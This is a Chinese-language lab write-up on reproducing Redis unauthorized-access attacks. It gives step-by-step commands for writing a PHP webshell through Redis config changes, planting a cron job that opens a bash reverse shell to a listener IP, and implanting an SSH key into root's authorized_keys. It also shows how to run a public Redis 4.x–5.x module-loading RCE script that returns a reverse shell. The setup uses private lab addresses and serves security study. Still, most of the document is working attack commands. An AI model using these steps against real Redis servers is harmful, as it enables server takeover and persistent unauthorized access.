前言
在复现有关redis一些漏洞的时候,踩了许多坑。真正体会到复现的不易,远没有想的那么简单。"童话里的都是骗人的"。
redis的安装方式
apt 安装
ubuntu安装
apt install redis-server
并修改了配置文件,设置允许外部访问,关闭保护模式。
在save是出现了error。
查看许多资料后,redis默认以redis权限运行。
在修改权限为果后,才知道需要在redis.service里配置备份可读写的路径。
需要在/etc/systemd/system/redis.service
文件中加入 ReadWriteDirectories=-/var/www/html
运行systemctl daemon-reload命令后,重启redis服务。才可以保存成功。
这种以apt安装的方式出现多个坑点。
考虑到实际需要。选择以root权限wget下载redis后再安装。
wget安装
随意选择了一种版本
进行下载安装
运行以下命令
apt-get install gcc && make
wget http://download.redis.io/releases/redis-4.0.9.tar.gz
tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
编译之后,进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下
cp redis-server /usr/bin
cp redis-cli /usr/bin
cd ../
ls
cp redis.conf /etc/
修改redis.conf配置文件允许外部连接并关闭保护模式
1、bind 127.0.0.1 这行前面加注释(#);
2、将redis.conf文件中的 protected-mode yes 改为no;
redis-server /etc/redis.conf 运行redis服务
查看发现redis以root权限运行。且以这种方式安装redis在save时不会出现error。
到此,环境才搭建好。
未授权访问
在windows本机上运行redis-cli.exe客户端进行实验
webshell写入
命令如下
config set dir /var/www/html 设置web目录
config set dbfilename webshell.php 设置备份文件名
set shell "" 设置值
save 保存
查看目录,发现成功写入。
条件是存在web目录及知道网站绝对路径。
bash反弹
命令如下
config set dir /var/spool/cron
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/172.16.111.210/80 0>&1\n\n"
config set dbfilename root
save
测试在ubuntu下无法反弹,centos反弹成功。
原因已经有大佬说明啦:
这是由于redis向任务计划文件里写内容出现乱码而导致的语法错误,而乱码是避免不了的,centos会忽略乱码去执行格式正确的任务计划,而ubuntu并不会忽略这些乱码,所以导致命令执行失败
条件是centos反弹
ssh秘钥
以kali做攻击机。
kali运行
ssh-keygen -t rsa
在kali上生成一对秘钥
在安装redis的ubuntu机器上 继续安装openssh-server
apt install openssh-server
并修改/etc/ssh/sshd_config 配置文件后允许远程连接
且ubuntu必须要有/etc/.ssh文件,否则测试不成功
运行命令,可生成该文件
ssh localhost
环境搭建好后,可进行测试
1. (echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt
将公钥写到centos的/root/.ssh/id_rsa文件
2. cat /root/.ssh/key.txt | redis-cli -h 172.16.111.196 -x set aaa
将刚刚生成的公钥设置给redis里的变量aaa
3.config set dir /root/.ssh
设置备份地址
4.config set dbfilename authorized_keys
备份文件文件名
执行完毕后会在ubuntu服务器的/root/.ssh目录下生成一个authorized_keys的公钥文件,利用这个公钥文件就可以远程连接ubuntu了
ssh 172.16.111.196 ssh远程连接
条件是ubuntu上需要存在/root/.ssh该文件
总结
以上就是redis未授权访问经常利用的三种方式。
复现后发现每种方式都有弊端,没有哪种方式通杀。
如果考虑实际情况的话,bash反弹还不错。
redis 4.0~5.0 rce漏洞
环境准备
kali(攻击机) 172.16.111.59 python redis exp 本地执行python脚本
ubuntu(靶机) 172.16.111.196 redis未授权访问漏洞
在kali上将exp下载
git clone https://github.com/Ridter/redis-rce.git
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
编译so文件
cd RedisModules-ExecuteCommand/
ls
make
之后复制module.so到redis-rce目录下,然后运行命令
python redis-rce.py -r 172.16.111.196 -L 172.16.111.59 -f module.so
-r 参数是指远程目标Redis IP地址;
-L参数是指本地监听服务器IP地址;
执行命令后,开启监听了本地的8888端口,并成功反弹shell。
比较鸡肋的是如果redis设置了密码将无法利用该漏洞。
参考资料
记一次失败漏洞利用的经历--ubuntu下的redis未授权访问漏洞复
Redis未授权访问漏洞复现与利用
Hackredis Enhanced Edition Script
Redis 4.x 5.x RCE